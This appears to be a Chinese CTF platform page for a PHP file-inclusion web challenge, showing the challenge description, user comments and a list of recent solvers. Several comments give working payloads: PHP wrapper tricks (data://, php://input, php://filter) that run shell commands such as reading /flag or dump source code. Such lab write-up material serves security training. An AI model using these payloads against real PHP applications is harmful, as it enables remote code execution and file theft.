简单的IncludeWEB 未解决

分数: 15 金币: 2
题目作者: hanzkj
一  血: flagOrz
一血奖励: 2金币
解  决: 186
提  示:
描  述:

听说你很会读文件?我把门(目录遍历)焊死了,窗户(关键词过滤)也封了。笔给你,你来写(payload)。

评论
网恋秀牛子被录屏导致自卑 1月前

/?page=data://text/plain,<?=exec("cat /fla?")?>

回复 0

shrinp 1月前

php://filter/convert.base64-encode/resource获取源码-》查看WAF细节-》使用data://text/plain, <?php 你需要的命令?>即可

回复 0

yinghui130 2月前

POST /?page=php://input HTTP/1.1 <br> Host: 171.80.2.169:15133 <br> <br> <?php system('tac /flag ');?>

回复 1
网恋秀牛子被录屏导致自卑 1月前

@111222 这不是实体编码,是bugku不让发尖括号之类的符号,自动把评论替换成实体编码了

回复 0

111222 2月前

谢谢你的思路,不过我用burp试了一下这里不用实体编码似乎也可以过

回复 0

Jazz888 2月前

flag{**********}

回复 0

wywitkey 2月前

解题思路是伪协议,先期php://filter/读源码,后期data://text/plain,读flag

回复 0

WriteUp

image
gxnb123

3 金币

评分(0)

暂无评分

解题动态

jiubanyipeng 攻破了该题 3天前
qq1002517 攻破了该题 4天前
scv 攻破了该题 5天前
xiaoxiaojiangshi 攻破了该题 8天前
shuiniu221 攻破了该题 9天前
xyqsin 攻破了该题 10天前
klfx1913 攻破了该题 13天前
等往事风中吹‘ 攻破了该题 13天前
Clinale 攻破了该题 14天前
瓜喵~ 攻破了该题 15天前
seyana 攻破了该题 15天前
mynb666 攻破了该题 16天前
南京交通第一深情徐立超 攻破了该题 18天前
言寺介 攻破了该题 22天前
AzKanna 攻破了该题 22天前
sunyq 攻破了该题 24天前
rf123 攻破了该题 25天前
1uxu4y 攻破了该题 26天前
luck1219 攻破了该题 28天前
陌兮li 攻破了该题 1月前
问题反馈